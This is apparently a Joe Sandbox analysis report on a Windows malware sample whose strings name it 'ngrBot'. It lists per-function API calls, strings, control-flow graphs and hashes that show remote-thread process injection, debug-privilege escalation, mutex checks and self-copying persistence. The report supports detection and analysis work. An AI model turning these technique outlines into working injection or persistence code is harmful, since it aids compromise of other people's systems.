11008 3643cc 11004->11008 11006 364374 11006->11000 11009 36437e CreateRemoteThread 11006->11009 11007->11008 11008->10979 11009->11000 11010 3643d5 11009->11010 11033 3637f0 GetProcessHeap HeapFree 11010->11033 11012 3643dc 11013 3643e6 11012->11013 11014 3643f4 CloseHandle 11012->11014 11013->10979 11014->10979 11016 3642bf 11015->11016 11017 3642ad IsWow64Process 11015->11017 11016->10997 11016->10998 11016->10999 11017->11016 11034 364020 11018->11034 11020 36417f VirtualAllocEx 11021 3641a5 11020->11021 11027 36428c 11020->11027 11022 364020 2 API calls 11021->11022 11023 3641b4 11022->11023 11024 364270 VirtualFreeEx 11023->11024 11028 364241 WriteProcessMemory 11023->11028 11025 364286 11024->11025 11024->11027 11039 3637f0 GetProcessHeap HeapFree 11025->11039 11027->11006 11028->11024 11029 364259 11028->11029 11029->11024 11030 36425e 11029->11030 11038 3637f0 GetProcessHeap HeapFree 11030->11038 11032 364264 11032->11006 11033->11012 11035 364040 11034->11035 11037 364046 11034->11037 11040 363810 GetProcessHeap HeapAlloc 11035->11040 11037->11020 11038->11032 11039->11027 11040->11037 11041->10983 11043 3649df 11042->11043 11045 364910 11042->11045 11043->10960 11044 364933 WaitForSingleObject 11046 364982 11044->11046 11049 364943 11044->11049 11045->11043 11045->11044 11046->10960 11047 364979 ReleaseMutex 11047->11046 11048 364470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 11048->11049 11049->11046 11049->11047 11049->11048 11050 3649b2 11049->11050 11051 3649a2 ReleaseMutex 11049->11051 11052 364470 4 API calls 11050->11052 11051->10960 11053 3649b7 11052->11053 11054 364470 4 API calls 11053->11054 11055 3649c1 ReleaseMutex 11054->11055 11055->10960 11058 363b9b 11057->11058 11066 363ba0 11057->11066 11058->10921 11059 363c6c 11059->10921 11060 363bd0 CreateEventA 11061 363c76 GetLastError 11060->11061 11062 363bee CreateNamedPipeA 11060->11062 11061->10921 11062->11061 11063 363c20 ConnectNamedPipe 11062->11063 11063->11061 11064 363c2f GetLastError GetLastError 11063->11064 11065 363c53 SetEvent 11064->11065 11064->11066 11065->11066 11066->11059 11066->11060 11068 363ca4 11067->11068 11080 363cef 11067->11080 11069 363d96 WaitForMultipleObjects 11068->11069 11068->11080 11070 363f1d GetLastError 11069->11070 11081 363db4 11069->11081 11070->11080 11071 363dd1 ReadFile 11071->11081 11072 363edd GetLastError 11073 363f2c DisconnectNamedPipe ConnectNamedPipe 11072->11073 11074 363eea GetLastError 11072->11074 11073->10925 11076 363ef3 GetLastError 11074->11076 11074->11081 11075 363e25 GetOverlappedResult 11075->11072 11075->11081 11076->11081 11077 363eff WaitForMultipleObjects 11077->11070 11077->11081 11079 363eb3 ReadFile 11079->11072 11080->10925 11081->11071 11081->11072 11081->11075 11081->11077 11081->11079 11081->11080 11085 363b2a 11082->11085 11086 363b89 11082->11086 11083 363b5b CloseHandle 11083->11085 11084 363b6e CloseHandle 11084->11085 11085->11083 11085->11084 11085->11086 11086->10916 11088 364875 11087->11088 11089 3647d1 11087->11089 11088->10708 11089->11088 11090 3647ed InterlockedIncrement 11089->11090 11094 364807 11090->11094 11091 36485c 11091->10708 11092 364560 8 API calls 11092->11094 11093 364470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 11093->11094 11094->11091 11094->11092 11094->11093

                                                                  Executed Functions

                                                                  Function 00365A20 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 189threadlibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 54 365a20-365a31 call 3635e0 57 365a37-365a3e call 363a20 54->57 58 365c49-365c4c 54->58 57->58 61 365a44-365a5b 57->61 62 365ae5-365aea call 364d00 61->62 63 365a61-365a68 61->63 67 365aef-365b63 LdrEnumerateLoadedModules call 363080 * 2 62->67 63->62 64 365a6a-365a76 63->64 64->62 66 365a78-365a87 call 363920 64->66 72 365c46-365c48 66->72 73 365a8d-365a97 66->73 80 365b65-365b6c 67->80 81 365b70-365b85 67->81 72->58 75 365a9c-365aa0 73->75 76 365a99 73->76 78 365aa2-365aa5 75->78 79 365ad8-365ae3 75->79 76->75 82 365aaa-365aac 78->82 79->62 79->66 80->81 83 365b87-365b8b 81->83 84 365bcc-365be5 81->84 87 365ab3 82->87 88 365aae-365ab1 82->88 89 365bc3-365bca 83->89 90 365b8d-365ba7 call 3639a0 83->90 85 365be7-365bf2 84->85 86 365bf4-365c0a CreateThread CloseHandle 84->86 85->86 92 365c0c-365c1f 85->92 86->92 93 365ab7-365ac2 call 363750 87->93 88->93 89->83 89->84 90->89 100 365ba9-365bbf 90->100 96 365c21-365c2c 92->96 97 365c2e-365c44 CreateThread CloseHandle 92->97 93->72 101 365ac8-365ad3 93->101 96->72 96->97 97->72 100->89 103 365aa7 101->103 104 365ad5 101->104 103->82 104->79
                                                                  APIs
                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,00365040,g\6), ref: 00365B0D
                                                                  • CreateThread.KERNEL32(00000000,00000000,00365070,00000000,00000000,00000000), ref: 00365C03
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00365C0A
                                                                  • CreateThread.KERNEL32(00000000,00000000,003650F0,00000000,00000000,00000000), ref: 00365C3D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00365C44
                                                                    • Part of subcall function 00363920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00363962
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleStringThread$AnsiEnumerateLoadedModulesUnicode
                                                                  • String ID: LdrLoadDll$NtResumeThread$g\6$g\6$ntdll.dll
                                                                  • API String ID: 1691487058-1552861057
                                                                  • Opcode ID: 19032fc6d19f31b1a0fcfd54ade410f2cfd92bb80e1c9f8976351988598bdf00
                                                                  • Instruction ID: b1b5cff40bcc17cd21162c59e12561d87a5f1172ec8b209b1d8d2f610696a0e5
                                                                  • Opcode Fuzzy Hash: 19032fc6d19f31b1a0fcfd54ade410f2cfd92bb80e1c9f8976351988598bdf00
                                                                  • Instruction Fuzzy Hash: DD61E375B40B02ABDB22DF68CC81FA673A8BF44704F168529E805DB789D771F901CB94
                                                                  Function 00404C20 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00404E7E,SeDebugPrivilege,00000001,00000000,ntdll.dll,NtGetNextProcess), ref: 00404C32
                                                                  • GetLastError.KERNEL32 ref: 00404C3C
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00404C52
                                                                  • GetLastError.KERNEL32 ref: 00404C5C
                                                                  • CloseHandle.KERNEL32(?), ref: 00404C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseHandleLookupOpenPrivilegeProcessTokenValue
                                                                  • String ID:
                                                                  • API String ID: 1673749002-0
                                                                  • Opcode ID: f03f0848109c1344e6a2f5cf10159e03204b2a801caeae268af0c0d772a4c6b3
                                                                  • Instruction ID: cd08b55a34506c6a1006ed51419cf0447f88819c37ae619cecf6d360b10e5dd7
                                                                  • Opcode Fuzzy Hash: f03f0848109c1344e6a2f5cf10159e03204b2a801caeae268af0c0d772a4c6b3
                                                                  • Instruction Fuzzy Hash: AF115175A00208ABDB10DBA4DC09FAEBBB8EB4D705F018569FB09E6290DA719E048765
                                                                  Function 004042E0 Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 166 4042e0-4042f1 call 4035e0 169 4042f3-4042f8 166->169 170 4042f9-40430e call 4042a0 166->170 173 404310-404317 170->173 174 404318-404321 170->174 175 404323-404338 VirtualAllocEx 174->175 176 40433a-40433f 174->176 175->176 177 40439f-4043ad GetLastError 175->177 178 404341-404354 WriteProcessMemory 176->178 179 40435e-40437c call 404160 176->179 182 4043ba-4043bf 177->182 183 4043af-4043b8 VirtualFreeEx 177->183 178->177 180 404356-40435c 178->180 179->177 187 40437e-40439d CreateRemoteThread 179->187 180->177 180->179 184 4043c1-4043ca VirtualFreeEx 182->184 185 4043cc-4043d4 182->185 183->182 184->185 187->177 188 4043d5-4043e4 call 4037f0 187->188 191 4043f4-404406 CloseHandle 188->191 192 4043e6-4043f3 188->192
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 566e3e481d76894f5171262dd43e3c3fbe6268a2b3aa79397b897dea9fa663b3
                                                                  • Instruction ID: 17ae2c20974ab2b3a02811892eedffa6f42bd494a781ace9a9728c4982da2f5b
                                                                  • Opcode Fuzzy Hash: 566e3e481d76894f5171262dd43e3c3fbe6268a2b3aa79397b897dea9fa663b3
                                                                  • Instruction Fuzzy Hash: 9F3186B17002046BD7209F6AEC41F6BB7ACEB84751F14457AFE09E73D0DA75ED0086A8
                                                                  Function 00404D00 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 105COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NtGetNextProcess$SeDebugPrivilege$ntdll.dll
                                                                  • API String ID: 0-503679825
                                                                  • Opcode ID: c4a0804236e7788b4098f7f275e0abd03e10ea5118c1f2739568c315aa77eb9b
                                                                  • Instruction ID: 5ed088abe51bc9704de4a451be291cc52f30af1fc387e08d9dd35c0f4901fdcf
                                                                  • Opcode Fuzzy Hash: c4a0804236e7788b4098f7f275e0abd03e10ea5118c1f2739568c315aa77eb9b
                                                                  • Instruction Fuzzy Hash: B831DBF0A4430476D620BFB69C07BAE3658AF44709F00547BFA84B72D2EEBD564097AD
                                                                  Function 00364D00 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 105COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NtGetNextProcess$SeDebugPrivilege$ntdll.dll
                                                                  • API String ID: 0-503679825
                                                                  • Opcode ID: 959a34c09acb6bbde116e028ea15d575a48bcba2001aef82aee4aca5b1ef8165
                                                                  • Instruction ID: d985b870f33fec2ea17a322ac20dd4c82274ce4c4112a81b87e434a2f0ce7684
                                                                  • Opcode Fuzzy Hash: 959a34c09acb6bbde116e028ea15d575a48bcba2001aef82aee4aca5b1ef8165
                                                                  • Instruction Fuzzy Hash: 3131EA70E54204B6D723BBB9AC07BEE325C9B05B00F00C456F948AB3C6FEB55A4087A9
                                                                  Function 004056E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 327 4056e0-4056ed 328 4056f5-405749 call 402c60 call 402cd0 NtQuerySystemInformation 327->328 329 4056ef-4056f4 327->329 334 405795-40579c 328->334 335 40574b 328->335 336 4057a0-4057a5 334->336 337 405750-405755 335->337 340 4057a7-4057b5 336->340 341 4057ed-4057f1 336->341 338 405762-405777 call 402cd0 337->338 339 405757-40575c 337->339 344 405815-40581c 338->344 352 40577d-405793 NtQuerySystemInformation 338->352 339->338 339->344 346 4057d0-4057da call 404410 340->346 347 4057b7-4057ce 340->347 342 4057f3-4057fd 341->342 343 4057ff-405803 call 402ca0 341->343 342->336 342->343 351 405808-405814 343->351 354 4057df-4057e4 346->354 347->341 347->346 352->334 352->337 354->341 355 4057e6 354->355 355->341
                                                                  APIs
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 00405741
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 0040578B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InformationQuerySystem
                                                                  • String ID: (mA
                                                                  • API String ID: 3562636166-412592806
                                                                  • Opcode ID: 54551fad4c689b88b6c56286297f79b65224b9cbcfa60a58bb591db8606bca24
                                                                  • Instruction ID: cd5f570840ed0612bd24c40dad0ef41f87404906c4f3f406656de7144237ac50
                                                                  • Opcode Fuzzy Hash: 54551fad4c689b88b6c56286297f79b65224b9cbcfa60a58bb591db8606bca24
                                                                  • Instruction Fuzzy Hash: 62418375A00619ABDB10DBA4DD81FBFB3B8EB88704F04456DE905A7380E678ED44DBA4
                                                                  Function 00404160 Relevance: 4.6, APIs: 3, Instructions: 122memoryinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000040,00000000,?,?,?), ref: 00404192
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0040424F
                                                                  • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0040427C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFreeMemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3247110995-0
                                                                  • Opcode ID: 02f7cf14a14e9807913e6e7e1cc57f194bdd3776d6a4df443f608aa8a8b972a6
                                                                  • Instruction ID: 66c8841409591aed13a986a2bc30d40898740935292764979a82c35a27653c4f
                                                                  • Opcode Fuzzy Hash: 02f7cf14a14e9807913e6e7e1cc57f194bdd3776d6a4df443f608aa8a8b972a6
                                                                  • Instruction Fuzzy Hash: 1C31B0F2A00218ABCB20DFA5EC85B6FB768EB84754B05457DFE0977341D634EE048A98
                                                                  Function 00365C50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00365A20: LdrEnumerateLoadedModules.NTDLL(00000000,00365040,g\6), ref: 00365B0D
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,?,00000800,00000000), ref: 00365C80
                                                                    • Part of subcall function 003649F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003673CC,00397C98,00000000,00000000,00000010,00000000), ref: 00364A10
                                                                    • Part of subcall function 003649F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00364A77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EnumerateInformationLoadedModulesMutexObjectProcessQueryReleaseSingleWait
                                                                  • String ID: STFU
                                                                  • API String ID: 2599885325-778810564
                                                                  • Opcode ID: 7c343b45f06b9c4611cd96e8dc4ba06767e0b6b014b8d2ca954ea7f556f982d8
                                                                  • Instruction ID: 28b673313a99262b3ef8c2a54ff46bac9cdcf8adf4d0c41bea9d4c55dfd22623
                                                                  • Opcode Fuzzy Hash: 7c343b45f06b9c4611cd96e8dc4ba06767e0b6b014b8d2ca954ea7f556f982d8
                                                                  • Instruction Fuzzy Hash: 6301ACB1A403086AEB51EBA49C03FBB72ECEB05700F00C1A5BA44EB180FE719954C7E5
                                                                  Function 00410910 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 172sleepstringmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00410930
                                                                  • GetProcessHeap.KERNEL32 ref: 0041093D
                                                                  • memset.MSVCRT ref: 0041095D
                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00410982
                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000,00000005), ref: 004109BF
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                  • GetTickCount.KERNEL32 ref: 004109CF
                                                                  • Sleep.KERNELBASE ref: 00410A05
                                                                  • OpenMutexA.KERNEL32 ref: 00410A17
                                                                  • GetLastError.KERNEL32 ref: 00410A27
                                                                  • GetLastError.KERNEL32 ref: 00410A2E
                                                                  • ExitProcess.KERNEL32 ref: 00410A32
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 00410A3D
                                                                  • _snprintf.MSVCRT ref: 00410A60
                                                                  • ExitProcess.KERNEL32 ref: 00410A79
                                                                  • ExitProcess.KERNEL32 ref: 00410A98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0044AFB0,00000208), ref: 00410ACC
                                                                  • wsprintfW.USER32 ref: 00410ADE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044ADA0,000000FF,0044AC50,00000104,00000000,00000000), ref: 00410B06
                                                                  • lstrcpynW.KERNEL32(0044B1B8,00000000,00000208), ref: 00410B13
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,0044B3E0,00000104,00000000,00000000), ref: 00410B2E
                                                                  • Sleep.KERNELBASE(000009C4), ref: 00410B59
                                                                  • ExitProcess.KERNEL32 ref: 00410B70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exitmemset$lstrlen$ByteCharErrorFileLastModuleMultiNameSleepWide_snprintf$CountExecuteHeapMutexOpenShellTick_vsnprintflstrcpynwsprintf
                                                                  • String ID: %08x$%s\Microsoft\%s.exe$30e44aa1$OPEN$ngrBot$running
                                                                  • API String ID: 2173303953-2917108782
                                                                  • Opcode ID: 3f17dcce76c53ba9253c23bd9188473ab1a318a1f66791ecfc87204156b81db0
                                                                  • Instruction ID: 4ffe1fa680e8cfeee387428967875dcc16e730cc5b6ba411c3a4c92c7f9556b3
                                                                  • Opcode Fuzzy Hash: 3f17dcce76c53ba9253c23bd9188473ab1a318a1f66791ecfc87204156b81db0
                                                                  • Instruction Fuzzy Hash: 9F51C775E84304BBE710ABB19C0BFDA3A689B54B05F148076F709F61D1DAF856C0876E
                                                                  Function 0040B300 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 129stringmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040B312
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040B319
                                                                  • memset.MSVCRT ref: 0040B339
                                                                  • memset.MSVCRT ref: 0040B354
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0040B387
                                                                  • lstrcpynW.KERNEL32(?,?,00000004), ref: 0040B3A1
                                                                  • GetVolumeInformationW.KERNELBASE ref: 0040B3BB
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040B3D8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040B3F0
                                                                  • lstrcatW.KERNEL32(00000000,.exe), ref: 0040B461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlenmemset$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpyn
                                                                  • String ID: .exe$30e44aa1$lol$lol.exe
                                                                  • API String ID: 1748614950-52295467
                                                                  • Opcode ID: d3657b4a80b9d4a6581e6a83d54c6d066d10b995bc1c007895724c77d5465172
                                                                  • Instruction ID: 8b3afc46e6e6bf4e113eda6340ead4404c7cc4be090bb0c5156ba26052e09737
                                                                  • Opcode Fuzzy Hash: d3657b4a80b9d4a6581e6a83d54c6d066d10b995bc1c007895724c77d5465172
                                                                  • Instruction Fuzzy Hash: 3A41F771601314A6C7208B668C05AEFBBB9EF88311F14C1A7FA18D6191E7B88A50D7AD
                                                                  Function 00404AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111synchronizationstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 131 404ae0-404af0 132 404af2-404af7 131->132 133 404b54-404b5b 131->133 132->133 134 404af9-404b49 call 4035f0 strncpy sprintf CreateMutexA 132->134 137 404b4b-404b51 call 404880 134->137 138 404b5c-404b94 _snprintf OpenFileMappingA 134->138 137->133 140 404b96-404b97 CloseHandle 138->140 141 404b9d-404b9f 138->141 140->141 143 404ba1-404ba8 call 404560 141->143 144 404bb4-404bc6 call 404470 141->144 147 404bad-404bb2 143->147 150 404bc8-404bce call 404880 144->150 151 404bda-404bdc 144->151 147->144 149 404bd1-404bd9 147->149 150->149 153 404c08-404c13 151->153 154 404bde-404beb WaitForSingleObject 151->154 154->153 156 404bed-404c02 ReleaseMutex 154->156 156->153
                                                                  APIs
                                                                  • strncpy.MSVCRT ref: 00404B1A
                                                                  • sprintf.MSVCRT ref: 00404B2C
                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B3F
                                                                  • _snprintf.MSVCRT ref: 00404B6F
                                                                  • OpenFileMappingA.KERNEL32 ref: 00404B85
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404B97
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE3
                                                                  • ReleaseMutex.KERNEL32(?,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404C02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Mutex$CloseCreateFileHandleMappingObjectOpenReleaseSingleWait_snprintfsprintfstrncpy
                                                                  • String ID: %s_0$-%sMutex
                                                                  • API String ID: 4144850300-892854768
                                                                  • Opcode ID: ecddfadb3e7974d3b479c769f3db4150c2fa8099748c697d7ff10cc592852ed6
                                                                  • Instruction ID: f71ab11216f24301a232ac9e3dee7d330e97c1bd754f36d27f0bed8dafa8c0fd
                                                                  • Opcode Fuzzy Hash: ecddfadb3e7974d3b479c769f3db4150c2fa8099748c697d7ff10cc592852ed6
                                                                  • Instruction Fuzzy Hash: 54313AF16003046BD710AF659C81FDBB7AC9F84714F04857BFF48A72D0EAB5E9848698
                                                                  Function 00364AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111synchronizationstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 105 364ae0-364af0 106 364b54-364b5b 105->106 107 364af2-364af7 105->107 107->106 108 364af9-364b49 call 3635f0 strncpy sprintf CreateMutexA 107->108 111 364b5c-364b94 _snprintf OpenFileMappingA 108->111 112 364b4b-364b51 call 364880 108->112 113 364b96-364b97 CloseHandle 111->113 114 364b9d-364b9f 111->114 112->106 113->114 117 364bb4-364bb7 call 364470 114->117 118 364ba1-364bb2 call 364560 114->118 122 364bbc-364bc6 117->122 118->117 123 364bd1-364bd9 118->123 124 364bda-364bdc 122->124 125 364bc8-364bce call 364880 122->125 126 364bde-364beb WaitForSingleObject 124->126 127 364c08-364c13 124->127 125->123 126->127 129 364bed-364c02 ReleaseMutex 126->129 129->127
                                                                  APIs
                                                                  • strncpy.MSVCRT ref: 00364B1A
                                                                  • sprintf.MSVCRT ref: 00364B2C
                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00364B3F
                                                                  • _snprintf.MSVCRT ref: 00364B6F
                                                                  • OpenFileMappingA.KERNEL32 ref: 00364B85
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00364B97
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00364BE3
                                                                  • ReleaseMutex.KERNEL32(?,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00364C02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Mutex$CloseCreateFileHandleMappingObjectOpenReleaseSingleWait_snprintfsprintfstrncpy
                                                                  • String ID: %s_0$-%sMutex
                                                                  • API String ID: 4144850300-892854768
                                                                  • Opcode ID: f6845b6598138032d7c7dc84486543f734c93618186e9de6dfc106e31b73ec49
                                                                  • Instruction ID: 13a83959ea67d68d94bc2c7a3f1d2e2484e6cf9836644424c9859b1f75063f7d
                                                                  • Opcode Fuzzy Hash: f6845b6598138032d7c7dc84486543f734c93618186e9de6dfc106e31b73ec49
                                                                  • Instruction Fuzzy Hash: 06312CB2A00204ABD7219F68DC42FDA77EC9F44710F04C559FE4D9B184EAB1D9848690
                                                                  Function 0040F2B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 281 40f2b0-40f2d1 call 403810 284 40f2d3-40f2da 281->284 285 40f2db-40f305 sprintf CreateFileA 281->285 286 40f375-40f387 call 4037f0 285->286 287 40f307-40f363 memset DeviceIoControl CloseHandle 285->287 287->286 288 40f365-40f36c 287->288 288->286 290 40f36e 288->290 290->286
                                                                  APIs
                                                                    • Part of subcall function 00403810: GetProcessHeap.KERNEL32(00000000,00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403819
                                                                    • Part of subcall function 00403810: RtlAllocateHeap.NTDLL(00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403820
                                                                  • sprintf.MSVCRT ref: 0040F2E9
                                                                  • CreateFileA.KERNELBASE(00000000,00000000,00000003,00000000,00000003,00000000,00000000), ref: 0040F2FA
                                                                  • memset.MSVCRT ref: 0040F323
                                                                  • DeviceIoControl.KERNELBASE(00000000,002D1400,004109A7,0000000C,?,00000400,00000000,00000000), ref: 0040F352
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040F35B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocateCloseControlCreateDeviceFileHandleProcessmemsetsprintf
                                                                  • String ID: \\.\%c:
                                                                  • API String ID: 3888047447-1260769427
                                                                  • Opcode ID: ff8d1dc2011cb1bfb04a541e805314c1674ac90d9df941c15e93383af5fb76e0
                                                                  • Instruction ID: 06110f1b05a4b9b3a9b8087ee69a5e127bd0aec849f1c9d495b94b1698777b9d
                                                                  • Opcode Fuzzy Hash: ff8d1dc2011cb1bfb04a541e805314c1674ac90d9df941c15e93383af5fb76e0
